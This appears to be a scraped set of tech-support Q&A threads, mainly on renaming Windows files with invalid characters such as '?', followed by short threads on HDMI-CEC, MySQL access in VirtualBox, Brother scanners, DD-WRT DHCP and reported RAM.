Boys - Se?orita - www.file24ever.com.mp3(31966) in directory 31962.File 31966 has been orphaned since all its filenames were invalidWindows will recover the file in the orphan recovery phase.Correcting minor file name errors in file 31966.Deleted invalid filename 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp3 (31973) in directory 31962.File 31973 has been orphaned since all its filenames were invalidWindows will recover the file in the orphan recovery phase.Correcting minor file name errors in file 31973.73 percent complete. (233642 of 245164 index entries processed)Deleting index entry 01 Los Lonely Boys - Se?orita - www.file24ever.com.mp3 in index $I30 of file 31962.Deleting index entry 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp3 in index $I30 of file 31962. 245164 index entries processed.Index verification completed.CHKDSK is scanning unindexed files for reconnect to their original directory. 2 unindexed files scanned.CHKDSK is recovering remaining unindexed files. 2 unindexed files recovered.CHKDSK is verifying security descriptors (stage 3 of 3)... 231424 file SDs/SIDs processed.Cleaning up 41 unused index entries from index $SII of file 9.Cleaning up 41 unused index entries from index $SDH of file 9.Cleaning up 41 unused security descriptors.Security descriptor verification completed. 6871 data files processed.CHKDSK is verifying Usn Journal... 1116928 USN bytes processed.Usn Journal verification completed.Correcting errors in the master file table's (MFT) BITMAP attribute.Windows has made corrections to the file system. 244196000 KB total disk space. 158175168 KB in 30003 files.22820 KB in 6873 indexes. 0 KB in bad sectors. 306168 KB in use by the system.65536 KB occupied by the log file. 85691844 KB available on disk. 4096 bytes in each allocation unit. 61049000 total allocation units on disk. 21422961 allocation units available on disk.E:\islag\Music\llb>dir Volume in drive E is FreeAgent Drive Volume Serial Number is 5038-892A Directory of E:\islag\Music\llb02/02/2011 12:18 PM <DIR>.02/02/2011 12:18 PM <DIR>..0 File(s) 0 bytes2 Dir(s) 87,743,979,520 bytes freeE:\islag\Music\llb>ShareImprove this answer Follow edited Jun 25, 2021 at 17:45 community wiki 2 revs, 2 users 100%Aubrey Island31Worked perfectly! This should be the answer. – enb081Jun 25, 2015 at 21:376@enb081 No, this shouldn't be the answer, since it doesn't have anything to do with the question, which was how to rename the files. Sheesh. – Jim BalterFeb 19, 2017 at 3:32You should advise that this will remove the files before showing the steps, or some unconcious user will delete them. A friend told me. – Juan C. RoldánFeb 12, 2020 at 16:57Add a comment | ; 13 Try specifying the UNC path (see Naming Files, Paths, and Namespaces). This gets around all sorts of restrictions. You would do it using the \\?\ syntax.Example, if your file was on your desktop (and your Windows drive is C:), you can docopy "\\?\C:\Users\codeLes\Desktop\Where Have All the Cowboys Gone?.ogg" "\\?\C:\Users\codeLes\Desktop\Where Have All the Cowboys Gone.ogg"Note: You can't use relative paths with this syntax; you must specify the full path. And it does not work with the ren command, but does work with copy and move.ShareImprove this answer Follow edited Feb 28, 2015 at 1:19 community wiki 2 revs, 2 users 71%Joshua44gave it a try, not luck "The filename, directory name, or volume label syntax is incorrect." Thanks! I'm getting to the point where I think the correct answer is to use Linux to rename it (which I have done). – codeLesSep 2, 2009 at 15:37This answer is definitely wrong. The restriction on valid characters is in the NTFS driver in the Windows kernel. \\?\ just bypasses file path processing in the user-mode runtime library. It doesn't allow opening filenames the contain the 5 wildcard characters ( *?"<> ), other reserved characters ( /|:\ ), or control characters. – Eryk SunDec 25, 2016 at 23:11It works in my case: I had a file name with Unicode character inside and with trailing \n . Don't ask me how do I created it (well, I'm trying to see if you can create multiple files with the identical name in Windows). Explorer, FreeCommander could not delete it but \\?\C:\... can. – Dio PhungJun 15, 2017 at 17:49I've used this way to rename files with extra spaces on the end of their names. The most common source, I've seen, of invalid file characters are from Macs using an SMB share. And from archive files (zip) created on a non windows platform. NTFS can support more characters than Windows can. So I'll have to disagree with Eryk, as the NTFS driver seems to allow these filenames to be created. – silicontripOct 31, 2020 at 3:36Add a comment | ; 11 chkdsk will sometimes fix invalid file names. You will get a message about removing the file because all the file names are invalid, and then recovering a lost file. You can then find the file in C:\found.000\file0000.chk. This is an effective way to remove the problem files, but not the best way if you want to keep them.ShareImprove this answer Follow answered Aug 9, 2011 at 0:24 community wiki gohop 2This simple trick just helped me. I had resigned myself to losing the file after chkdsk did its work but this answer reminded me about \found.000. – davidbakJan 29, 2019 at 7:50thank you. this is simple but effective way 👍 – علیرضاAug 9, 2019 at 3:48Add a comment | ; 11 The way i deleted the stubborn file was by opening 7zip, finding the file and renaming the file through 7zip. Mine was a song which had a space at the end of the file.ShareImprove this answer Follow answered Jan 12, 2014 at 9:59 community wiki anon 6You mean the file itself wasn't even in an archive, but you just used 7-Zip to rename it on the file system? Smart. – ArjanJan 12, 2014 at 10:44This works great. I tried several of the other options here, and this was the first one that worked. – rakensiJul 25, 2014 at 15:4827zip was able to rename your file because filenames that end with spaces aren't a problem in Windows. Filenames containing '?' are a problem, and 7zip can't rename them. – Jim BalterFeb 19, 2017 at 3:42This worked perfectly for me, because my problem turned out not to be actual question marks, but weird Unicode characters that just displayed as question marks in my file manager. By importing the files (there were hundreds) into a 7-Zip archive and then exporting them again, 7-Zip simply converted the bad characters to underscores (_). Then I was able to work with the files again. Problem completely solved. Thanks for an excellent tip! – JesperMay 12, 2017 at 0:37I can't rename files with ":" character: i.imgur.com/dZBqqeP.png – user598527May 20, 2017 at 12:16 | Show 1 more comment; 8 Use Recuva. It is primarily intended for recovering deleted files but it also has an option for including non-deleted files in its scan.After launching Recuva, refuse the wizard and select the right disk. Then go to Options, find and check the option "scan for non-deleted files" and launch the scan. After a while, it will show all the files on the disk (whether deleted or not). Find your files with invalid names (the names are already fixed in the view), select them, right click and save ("recover") somewhere.I have just done it (on Windows XP).ShareImprove this answer Follow edited May 20, 2017 at 12:53 community wiki 2 revs, 2 users 71%Jan Lachnitt1Worked fine for a filename with an embedded /n which 7-zip couldn't manipulate. – davidbakSep 7, 2019 at 22:13Add a comment | ; 6 The Microsoft tool DISKEDIT.EXE is a low-level tool for directly reading and writing raw disk data. You ought to be able to load the cluster containing the directory entry for this file and just change the offending '?' character to something innocuous and write it back to disk. It is my understanding that the Microsoft diskedit tool (not the Norton Utilities tool by the same name, which is only for FAT volumes) was last seen in Windows 2000 SP4. But there is a link to it that can be found here. To locate the right cluster, you can download a trial version of DiskExplorer for NTFS.You would start with File->Drive... to open the drive containing this bad file. Select Goto->Root Directory to get a directory view. Navigate to the directory containing your bad file by using the MFT# links. When you get there, the top of the window will say something like, "MFT# x12345 DIR: 'dirname', ...blah blah blah... starting at cluster x9302AE,... blah blah blah"Now move over to Microsoft diskedit. First do File->Open... and specify Volume Name C: (if the file is on your C: drive). Leave the Volume File Name blank. Take that starting cluster number and enter it into diskedit under Read->NTFS Clusters...->Starting Cluster (enter it as a hex number).Now use your arrow keys to scroll down to the bad filename. It's in unicode, so you'll be looking for something like "W.h.e.r.e. .H.a.v.e. .A.l.l. .t.h.e. .C.o.w.b.o.y.s. .G.o.n.e.?...o.g.g." Position your cursor over the bad "3F" character and type something safe, like 5F ('_'). Choose Write->It to write it back to disk.There is another spot to hit (not sure if one or both are needed). Now, back in DiskExplorer, click on the Mft# for the bad file. You'll get a screen with a tree thing on the left that says "structures". Click on "Attributes" in the tree. It will show you a list of attributes, one of which will be something like $30 ... $FILE_NAME. So, $30 has the file name. Click on the Body node under the $30 node in the Structures tree. Select menu View->as Hex. Several lines down, you should see the filename again W.h.e.r.e. .H.a.v.e... etc. Over on the left side of the screen, you'll see the Sector column, which shows which disk sector you're looking at.Back over the diskedit. Do Read->Sectors... and enter the sector number from DiskExplorer. As before, scroll down and replace the "3F" character with the same character as you did above. Choose Write->It to write it to disk.I did all this, and the tools tell me that I've changed the character, but explorer doesn't. The directory must be cached somewhere. After a reboot, the change becomes visible.ShareImprove this answer Follow edited Nov 5, 2009 at 14:01 community wiki 2 revsuser140681+1 for the correct (but more or less impractical) approach, hoping it'll bubble up a bit and overtake at least some of the wrong answers. ;) – Sz.Dec 17, 2017 at 4:01Add a comment | ; 5 If you have Cygwin installed it should be able to take care of the file. I had that problem just now and using rm from Cygwin in a bash shell was able to delete the file just fine when no Windows app, including Explorer and including trying to use the UNC filespec with CMD.exe helped.I would imagine that mv would do it to in case you wanted to keep the file.A barebones Cygwin setup only takes a few minutes, and I always keep it around anyway because there are so many good tools. It's easier than booting Linux, even using a live CD.ShareImprove this answer Follow answered Sep 21, 2012 at 15:26 community wiki ConceptJunkie 5I tried, cygwin wasn't able to delete the file ('No such file or directory'). Good idea though. – JulianHzgMar 1, 2014 at 13:541This worked for me, or using the similar MSYS2 (a rewrite of MSYS, a fork of Cygwin) on Windows 8.1. I was able to mv the file to a new name and then delete it normally. My file had a space at the end, and it showed up using 'dir' - 'ls' didn't show it though. – Brian BurnsMar 3, 2015 at 8:[email protected], at least you qualified your "works for me" statement. Of course it works for a filename with just a space at the end. \\?\ would also work in this case -- when used properly with a Unicode, fully-qualified path. It's bypassing the user-mode runtime library code that emulates some quirky old MS-DOS rule from the 80s that ignores spaces at the end of names. The problem with invalid and reserved characters can't be addressed like this. – Eryk SunDec 25, 2016 at 23:24FWIW this is the only solution that worked (easily) for me. I don't have admin rights on this PC so installing anything or using anything requiring admin privileges was not possible and I needed to remove a leftover file named con. I had MSYS2 on my machine and I could simply rm it. – SolarBearNov 20, 2020 at 14:04No, this does not work for file containing a : character. It says mv: cannot stat 'Screenshot from 2015-10-11 21:29:26.png': No such file or directory – BastianNov 22, 2020 at 15:44Add a comment | ; 4 Have you tried moving it to a file with the right name?move "Where Have All the Cowboys Gone?.mp3" "Where Have All the Cowboys Gone.mp3"ShareImprove this answer Follow answered Aug 28, 2009 at 19:49 community wiki Tom Kidd 52tried, no luck. "The Filename, directory name, or volume label syntax is incorrect" – codeLesAug 28, 2009 at 19:51It worked for me with the copy command. – NicolasMay 6, 2013 at 7:10@Nicolas, you mean there was a ? or * or < or > or : in the name, and copy-ing just worked? (I just tried it and it didn't for me, unsurprisingly.) – Sz.Dec 17, 2017 at 4:08@Sz. sorry to heard it didn't work for you. I don't remember the filename I had to rename, but it worked for me with the copy command. Did you also try cygwin and the bash command mv? – NicolasDec 20, 2017 at 9:441@Nicolas, thanks for trying to help, but my point is that those chars I listed above (and a few others, like ", |, /, and of course the backslash (which I can't seem to enter here :) )) are in a different class of problematic chars (reserved), and I'm afraid, neither the copy command nor Cygwin can get round to renaming them. (You most likely had some different chars in your problematic filename.) – Sz.Dec 20, 2017 at 13:28Add a comment | ; 4 Try using a third party tool such as the Ken Rename tool:or Rename Master.Here's a list of file renaming tools.I'd test them myself, but I'm running Windows Vista 64-bit; the file handling may be different.If those tools fail, you may want to give Windows PowerShell a shot. See Renaming Files on the Windows PowerShell Blog.ShareImprove this answer Follow edited Aug 11, 2011 at 21:07 community wiki 3 revs, 2 users 83%braveterry2I tried Directory Opus, and it didn't work (same error message). – user14068Nov 5, 2009 at 14:05I tried Flexible Renamer 8.4 which seems to do the trick. Sourced from the same website you mentioned. – JohnnyBizzleNov 29, 2014 at 10:41Add a comment | ; 4 If it's more than 1 file, create new directory with a simple name, for example a. Move one single file each time to that directory. In cmd.exe go to the new directory and type the following: ren *.ogg 1.ogg This is for simplicity. Then you can rename it in XP as you want, like 1.ogg to Where Have All the Cowboys Gone.ogg. ogg was just an example, extension can be anything.ShareImprove this answer Follow edited Feb 14, 2012 at 20:59 community wiki 2 revs, 2 users 64%slhck11Huh? How are you supposed to move that file (of OP) with the wildcard in its name? – Sz.Dec 17, 2017 at 4:05Add a comment | ; 3 Assuming the volume in question is FAT32 or NTFS, try running chkdsk. That should clean up 'corrupted' directory entries, which would (in this case) mean removing the ?. If it's the boot volume, you might need a reboot to do it.ShareImprove this answer Follow answered Aug 28, 2009 at 20:02 community wiki Michael Kohne 2I had a folder name with a : and doing this made the directory disappear. DON'T do this. – leeand00May 12, 2017 at 12:081Actually, chkdsk moved the contents of the folder in the root directory of the hdd to a hidden folder and I was able to get my files back there see: superuser.com/a/320654/2293 – leeand00May 12, 2017 at 12:31Add a comment | ; 3 This should work (at least, it did for me):dir /X *cowboys*That command would output somethig similar to this:08/11/2011 15:21 <DIR>WH5E97~1Where Have All the Cowboys Gone?.oggThat WH5E97~1 is what you're looking for!(Plase notice: such code is totally invented, but should be similar to the one you'll find)Knowing that, a simplerename WH5E97~1 "Where Have All the Cowboys Gone.ogg"should do the trick.Hope it helps.ShareImprove this answer Follow answered Nov 14, 2011 at 0:34 community wiki unwiredbrain 2Nice solution. Should work, but only works if the filename is longer than 8 characters (therefore not in my case). – JulianHzgMar 1, 2014 at 13:58Not necessarily. According to the documentation typing dir t97* returns both files, because the asterisk wildcard matches the file t.txt2 to t97.txt by using its short name map T97B4~1.TXT – unwiredbrainAug 18, 2014 at 12:08Add a comment | ; 2 have you tried:type "Where*.ogg" > "Where.ogg"might work.ShareImprove this answer Follow edited Jun 24, 2011 at 6:12 community wiki 2 revs, 2 users 83%Atmocreations12The filename, directory name, or volume label syntax is incorrect. – CiaranAug 28, 2009 at 23:23Add a comment | ; 1 Try a wildcard on the move - move "Where Have All the Cowboys Gone*.mp3" "Where.mp3"That's probably your best bet, as long as there is only one file that matches the wildcard.ShareImprove this answer Follow answered Aug 28, 2009 at 19:54 community wiki Michael Kohne 2Actually, in this case, it should already work with the filename as is since the question-mark is a wildcard. No need for the asterisk this time. – SynetechAug 20, 2013 at 14:532Sadly, that doesn't work, either with the original filename or with a more general wildcard like *.mp3. – JulianHzgMar 1, 2014 at 13:56Add a comment | ; 1 drag and drop to a new folder, navigate in command prompt to that folder and typeren *.* test.oggShareImprove this answer Follow answered Aug 28, 2009 at 20:00 community wiki William Hilsum 21dragging and dropping fails too with the same error... thanks though – codeLesAug 28, 2009 at 20:016Conversely you could try moving everything else out of the folder in question. – therefromhereSep 2, 2009 at 16:58Add a comment | ; 1 Try cygwin to rename the file:the command would be: mv filename?.ogg filename.oggShareImprove this answer Follow answered Sep 2, 2009 at 16:50 community wiki Keck 2i tried cygwin once on Vista, seemed to have the same issue, don't have access to it on my current work machine... – codeLesSep 2, 2009 at 17:11doesn't work, tried on Win7 64b – MaxJan 19, 2015 at 19:33Add a comment | ; 1 Most Microsoft internal commands are controlled with the presence of explorer.exe.Open your Task Manager and examine the list of current active processes. You will find explorer.exe among them. Right-click and terminate/stop/close explorer.exe. Do not close the Task Manager yet. Now, go to the offensive file using a secondary file-manager and try deleting or renaming with wildcards. It will probably be successful.Now, return to the Task Manager window and right-click top line saying Applications, then choose bottom button saying New Task. Enter explorer.exe. Explorer shows up again and the offensive file is no longer there.ShareImprove this answer Follow edited Oct 6, 2013 at 20:35 community wiki 2 revs, 2 users 71%Doktoro ReichardAdd a comment | ; 1 The WinRAR GUI will allow you to rename the files without even having to pack them into an archive first. I've tested it in Windows 8.1, on a very long file name. Worked like a charm.ShareImprove this answer Follow edited Jun 15, 2014 at 9:25 community wiki 2 revs, 2 users 67%KellyRavenholm0Add a comment | ; 1 If you have WinRAR, pack it on WinRAR, rename it on WinRAR, unpack it.Or you can try with a VBScript, take next script and save it under a file with .vbs extension.Dim fsoSet fso = CreateObject("Scripting.FileSystemObject")fso.MoveFile "Where Have All the Cowboys Gone?.ogg", "Where.ogg"ShareImprove this answer Follow edited Feb 27, 2015 at 4:14 community wiki 3 revs, 2 users 72%Jhonny D. Cano -Leftware-52I don't have WinRAR at work and my work machine is not on the net. I do have 7zip, anyway I can do that with 7zip, just tried and it wouldn't let me add it to the archive... same error :-) – codeLesAug 28, 2009 at 19:58tryijng your script nets me a "path not found" error (code: 800A004C). does it matter that this file is on an external USB drive? I put the file in the same folder... will try to hard code the entire file location next – codeLesAug 28, 2009 at 20:12fully qualified name no work either... – codeLesAug 28, 2009 at 20:13i agree up on the chkdsk option – Jhonny D. Cano -Leftware-Aug 28, 2009 at 20:18Tried it with WinRAR. Didn't work. Same result. – user14068Nov 5, 2009 at 14:12Add a comment | ; 1 This is not a direct answer (as in how can Windows rename a file) but this works for me.The illegal files are usually on an external drive so I connect the external drive to my Android tablet. This allows me to rename the file which can then be read by Windows. This deals with special chars but the usual problem I get is a file name starting or ending with a space or ending with a '.'I tried one of the 3rd party tools FlexRenamer but this still struggles with the above.ShareImprove this answer Follow answered Aug 22, 2015 at 23:47 community wiki JohnnyBizzle 1Worked great. I'd guess this would work with an iPhone also. – StayOnTargetJan 27, 2021 at 13:03Add a comment | ; 1 I've also had a similar problem with a folder. The folder name was ".min." which is normally not allowed.Rename Not Allowed (click for image)Using Winrar I was able to solve this.What i did was right click on the folderselect 'Add to archive...'select a new archive name (one with no special characters)from the archiving options select 'Delete files after archiving'than select OKAdd To Archive... (click for image)I then opened the .rar fileand renamed the file withinThis is allowed since windows does not really check what is inside of the .rar file.As soon as you change the name then extract the file and you are done.I hope this helps.ShareImprove this answer Follow answered May 24, 2016 at 12:18 community wiki Lefteris Eleftheriou 1Doesn't work for me. My filename is 10:2. – PacerierMar 11, 2017 at 11:12Add a comment | ; 1 Special characters don't work with ren; escape the problem character with move:move "Where Have All the Cowboys Gone^?.ogg" "Where Have All the Cowboys Gone.ogg"Tested in Win 10 with ? & %ShareImprove this answer Follow edited Dec 6, 2020 at 7:43 community wiki 2 revsZimbaAdd a comment | ; 0 Use cmd.exe in this directory with wildcards. For example:ren "Where Have All the *.ogg" "Where Have All the Cowboys Gone.ogg"ShareImprove this answer Follow edited Jul 4, 2011 at 8:35 community wiki 2 revs, 2 users 57%harrymc2Globbing is done by the shell. – Hello71Mar 22, 2011 at 21:293@Hello71: Not in a DOS box, Linux boy. – harrymcMar 22, 2011 at 21:47Add a comment | ; 0 7-Zip file manager (7-zip.org) will rename files and directories that XP cannot. Just used it to extract a .tar file and rename the enclosed, illegally named .chm file. No LiveCD required.Tschüß!ShareImprove this answer Follow answered Sep 9, 2014 at 17:42 community wiki monsignormoney Add a comment | ; 0 I had a similar problem with 2 nested folders with subfolders. I couldn't neither rename nor delete some of the files (I tried many ways). At last, I found the solution: Teracopy.Install it, right click the folder or file and select teracopy. Teracopy will open, then just click delete or rename. It will rename or delete it.You might want to give it a try.ShareImprove this answer Follow edited Sep 16, 2014 at 9:09 community wiki 3 revs, 3 users 41%Serkan PolatAdd a comment | ; 0 I've bumped into the same situation.Googling around I learnt there is no native solution.... and I use as a shell the JPSoft's TCC, which also could not handle those darned files.But, I also learnt that Cedrick Collomb's Unlocker (http://www.emptyloop.com/unlocker/) is able to handle'm.And I had it in my setup. Also, I highly recommend it.Well, at least this solution does not involve leaving windows environment...ShareImprove this answer Follow answered Jan 18, 2015 at 1:35 community wiki Marcus Vinicius Pompeu Add a comment | ; 0 I fixed a FLAC file like this by using Winamp's basic open command, using that program explorer window. When I went to the folder, I had the rename option, unlike Explorer.ShareImprove this answer Follow answered Feb 1, 2015 at 2:23 community wiki Freelance Add a comment | ; 0 I came across a similar situation. None of the posted solutions worked for me but I finally found an easy solution:No external tool neededNo knowledge of any programming or shell scripting language neededI simply copied the file (yes, copying was still possible for me) to a USB stick, renamed it there and placed it back again! I leave it to others to explain why that worked.ShareImprove this answer Follow answered Feb 26, 2015 at 20:30 community wiki David. Add a comment | 
My Panasonic TC-50A400U turns off and on when connected to my PC with an HDMI cable
tv;tv
My Panasonic TC-50A400U turns off and on when connected to my PC with an HDMI cable Ask Question
0 I had the same problem with an RCA android tablet on this model. This worked for me.Go to menu/setup/hdmi control. Change CEC function to off. Change power off link to "NO". Then plug your device in ... go to input on remote ... choose your appropriate hdmi channel.ShareImprove this answer Follow answered Apr 26, 2015 at 14:48DaveDave1Add a comment | 
Connect to MySQL in VirtualBox Ubuntu
ubuntu;php;mysql;ubuntu;php;mysql
Connect to MySQL in VirtualBox Ubuntu Ask Question
2 So you are basically saying that when you connect via IP address to the Ubuntu MySQL you can connect, but when you are on localhost you can’t correct?This could be an issue with MySQL grants being tied to the IP address. But unclear. I would do the following to debug.First, the basics.Before anything, you say you have php5 and php5-mcrypt installed. But what about php5-mysql? Something as simple as that could cause you headaches. Just run this line:sudo aptitude install php5-mysqlAnd once that is installed, restart Apache like this:sudo service apache2 restartNow if that clears things up, it was a simple software install issue. Anything else past that should be covered by the next two items.Next, check how MySQL networking is bound.If you have nmap install on you Ubuntu system, login to the command line on Ubuntu and run this command:nmap localhost -p 3306If you don’t have nmap installed, just run the following command to install it; it’s a nice simple network debugging tool all setups should have installed as a default:sudo aptitude install nmapThat will tell you if the MySQL port (3306) on your machine is open or not. For example I just did that on a test Ubuntu 12.04 setup I have and this is the response I get:Starting Nmap 5.21 ( http://nmap.org ) at 2014-11-30 01:29 ESTNmap scan report for localhost (127.0.0.1)Host is up (0.000070s latency).PORTSTATE SERVICE3306/tcp open mysqlThat tells me that the MySL port (3306) on my localhost is open. If that shows closed, that could be an issue and I would open up the my.cnf on the Ubuntu system and look for bind-address. I like to use nano so this is the command I would use:sudo nano /etc/mysql/my.cnfAnd on a non-networked install of MySQL the bind-address setting would be as follows:bind-address = 127.0.0.1That would force the binding to be only localhost (127.0.0.1). But if you say you can connect to the MySQL database from your Windows host machine, that could be set to a VirtualBox IP address like this; using a pseudo-example with a fake IP address:bind-address = 123.456.789.0And that would definitely allow the Windows host to connect but—and this is critical—but it would only allow connections via 123.456.789.0.So the better way to allow Windows as well as Ubuntu use the MySQL server on that VirtualBox setup is to comment out the bind-address line like this:# bind-address = 123.456.789.0And then restart MySQL like this:sudo service mysql restartWith that done your MySQL will be accessible within Ubuntu via localhost as well as on your Windows machine via an IP connection. It’s basically allowing any network connection in the world to connect to that machine. Which is not a good thing for a real world production server, but for a localized test/development setup it should be fine.Now, check how MySQL grants are setup for the database user.Now if that first part basically showed you that you successfully have networking between Ubuntu and Windows worlds but still can’t connect, the next issue could be tied to MySQL GRANTS which are basically user permissions in MySQL.To check your user’s grants you first should login to MySQL as a privileged user and run this command to connect to the mysql core database:CONNECT `mysql`;And then run this command to see what users/hosts you have setup:SELECT `user`, `host` from `user`;The output on a basic MySQL install should be something like this if you only have root setup:+------------------+-----------+| user | host |+------------------+-----------+| root | 127.0.0.1 || root | ::1 || debian-sys-maint | localhost || root | localhost |+------------------+-----------+Of course your list might be different than mine, so keep that in mind. But the key is you should see something like this. Note how root has three different entries in user: One for 127.0.0.1 (IPv4 address), ::1 (IPv6 address) and localhost (human readable hostname). That is the key here.The thing is if your user is bound only to the networked address—such as 123.456.789.0—then there is no way that user would be able to connect via localhost. So you would need to setup a separate grant for localhost.Doing something like that is fairly easy. Some people like to toss all grants to a user in a development environment like this:GRANT ALL PRIVILEGES ON `some_database`.* TO 'some_user'@'localhost';But I don’t like that for many reasons. I prefer to use a fairly safe, secure and standard set of grants for MySQL users that allows them to do what they have to in their database but disallows root privileges like this:GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, CREATE VIEW, SHOW VIEW, CREATE ROUTINE, ALTER ROUTINE, EVENT, TRIGGER ON `some_database`.* TO 'some_user'@'localhost';Of course change, some_database and some_user to match your specific setup. But after doing one of those GRANT commands, you need to tell MySQL to reload the privileges like this:FLUSH PRIVILEGES;And now if you run SHOW GRANTS on that user you can see all their rights as you have set them:SHOW GRANTS FOR 'some_user'@'localhost';Those are basically the two things I would look for and act on when I am debugging a MySQL networking/connection issue like this.Finally, test the connection from the command line.And now to test the connection from the Ubuntu 14.04 command line, just enter the following command:mysql -u some_user -pOf course change some_user to match your user and then enter your password. You should now be connected to MySQL via that user. If you can successfully connect via the command line, then you know the MySQL networking/connection stuff works well. So anything past that could be related to your PHP coding itself. And that is really something outside of the scope of a simple answer on this site; you need to debug your local PHP code yourself to solve that.ShareImprove this answer Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered Nov 30, 2014 at 6:38Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges0Add a comment | 
Running a game using 3D acceleration in separate virtual terminal slow unless running as root
gaming;virtual-terminal;gaming;virtual-terminal
Running a game using 3D acceleration in separate virtual terminal slow unless running as root Ask Question
0 I just figured it out. I added myself to the video and games group. I'm not sure which one did it, but it worked.One oddity I ran into while messing with this: before making the group change I ran glxgears instead; as root it was getting about the same FPS as if I'd ran it from the default session, but as my user it was reporting around 500fps.ShareImprove this answer Follow edited Nov 30, 2014 at 7:42 answered Nov 30, 2014 at 6:16Brian VandenbergBrian Vandenberg54444 silver badges1515 bronze badgesAdd a comment | 
Brother MFC Doesn't Show Up in OS X's Image Capture, etc
osx-yosemite;scanning;all-in-one;brother-printer;osx-yosemite;scanning;all-in-one;brother-printer
Brother MFC Doesn't Show Up in OS X's Image Capture, etc Ask Question
0 Try connecting to the device using a USB cable.I have the same issue with a Brother DCP-9010CN. I notice that Brother's OS X Yosemite Support Statement mentions that:"Scan to Network" function is not supported in OS X v10.10.x.Perhaps this means scanning over the network is not supported. With a USB cable, I was able to scan.ShareImprove this answer Follow edited Jun 28, 2015 at 14:19 answered Jun 28, 2015 at 13:29Matt FalkenhagenMatt Falkenhagen1611 bronze badgeAdd a comment | ; 0 The scanner uses a separate scanner driver (Country specific web sites, try the direct link Brother_ScannerDrivers_1_0_0.dmg. Found it by search for MFC-7820N and filtering for 10.10. Looking in the install package contained within there's a Brother Scanner.app. Shows a date of October 10, 2014. The MFC-7820N is listed in the com.brother.DeviceDB.plist for the app. It also contains a TWAIN driver. If that doesn't work by itself see TWAIN Scanners in OS X Maverick (and Yosemite). I don't have a Brother scanner to try it. Apple supports a lot of printer/scanner vendors directly (Cannon, Epson, FujiXerox, Gestetner, HP, Infoprint, Infotec, Lanier, Lexmark, NRG, Ricoh, Samsung and Savin), although I'm sure with vendor help. Notice Brother is missing from the list.ShareImprove this answer Follow answered Nov 30, 2014 at 7:05 user187561user1875611Thanks for your help @DavidKoontz! I tried the recommendation from that site, but sadly, it didn't seem to make a difference. Apple does support Brother (at least in theory), according to their HCL: support.apple.com/en-us/HT201465. – Timothy R. ButlerNov 30, 2014 at 7:38Add a comment | ; 0 I'm working at a small company and when I went to upgrade computers from 10.9 to 10.10, I had the same issue. They could no longer scan through Image Capture.When I called the Brother, they told me that they no longer supported that option (scanning to network). However, they did support scanning through the Brother Control Center application. ShareImprove this answer Follow answered Jan 28, 2016 at 0:20RobertjmRobertjm1111 bronze badgeAdd a comment | ; 0 Apple has my device on their supported list at https://support.apple.com/en-us/HT201465 but it didn't start out showing my shared list on 10.13.2 High Sierra.Eventually I got it working; here's what I did but I don't know which step did it:Used the automatic Mac printer install by selecting the bonjourprinterDownloaded and installed the Printer driver from BrotherDownloaded and installed the Scanner driver from BrotherUsed the add new printer button again but manually selected the newly installed BR-Script (PS emulation) driver(At this point the shared list was still empty)Restarted the the computerNow it shows in my shared list and seems to function fine.ShareImprove this answer Follow edited Dec 14, 2017 at 22:36 answered Dec 14, 2017 at 7:41CharlieCharlie47244 silver badges1010 bronze badgesAdd a comment | 
Minimize windows do not appear on my taskbar
windows;windows
Minimize windows do not appear on my taskbar Ask Question
0 Try these options to isolate and fix the issue.Check the open applications status with another user profile. If the applications seems to fine and showing at the task bar then it may the current user profile issue and may be corruptedOpen Task Manager and kill 'explorer.exe'. Then click on "New Task" icon and browse it to the 'explorer.exe' (\Windows) and open it. Or, perform "sfc /scannow" command in the command prompt and restart the machine once the scan is over.Hope this helps.ShareImprove this answer Follow answered Nov 30, 2014 at 8:40vembutechvembutech6,18211 gold badge1919 silver badges2121 bronze badgesAdd a comment | 
Can I make my Router (DD-WRT) act as DHCP server for an unmanaged switch that is not connected to it?
networking;dhcp;dd-wrt;networking;dhcp;dd-wrt
Can I make my Router (DD-WRT) act as DHCP server for an unmanaged switch that is not connected to it? Ask Question
1 Well I guess you could setup the DHCP server to advertise on the WAN interface but that is a less than perfect idea. However it would allow you to lease addresses to the other "network".A better idea would be to attach the unmanaged switch to back of the ASUS on "port 2" doing so would allow you to advertise the DHCP server on the LAN side of your network and still give addresses to the computer hanging off the switch.Does that make sense?ShareImprove this answer Follow answered Nov 30, 2014 at 5:13ianc1215ianc12153,1841313 gold badges3838 silver badges5858 bronze badgesAdd a comment | 
Windows 8.1 only says 3.06GB RAM available
memory;windows-8.1;memory;windows-8.1
Windows 8.1 only says 3.06GB RAM available Ask Question
1 The usable memory may be less than the installed memory on Windows computersOn a computer that is running Windows 7, the usable memory (RAM) may be less than the installed memory.For example, a 32-bit version of Windows 7 may report that there is only 3.5 GB of usable system memory on a computer that has 4 GB of memory installed.Or, a 64-bit version of Windows 7 may report that there is only 7.1 GB of usable system memory on a computer that has 8 GB of memory installed....The reduction in available system memory depends on the configuration of the following:The devices that are installed in the computer and the memory that is reserved by those devicesThe ability of the motherboard to handle memoryThe System BIOS version and settingsThe version of Windows 7 that is installed (For example, Windows 7 Starter Edition only supports 2 GB of installed memory.)Other system settingsThe above applies to Windows 8 and 8.1 as well.Source The usable memory may be less than the installed memory on Windows 7-based computers:ShareImprove this answer Follow edited Aug 26, 2015 at 21:59 answered Nov 30, 2014 at 7:04DavidPostill♦DavidPostill149k7777 gold badges343343 silver badges383383 bronze badgesAdd a comment | 
What are the performance differences between SSD caching and native SSD usage?
hard-drive;performance;ssd;raid;hard-drive;performance;ssd;raid
What are the performance differences between SSD caching and native SSD usage? Ask Question
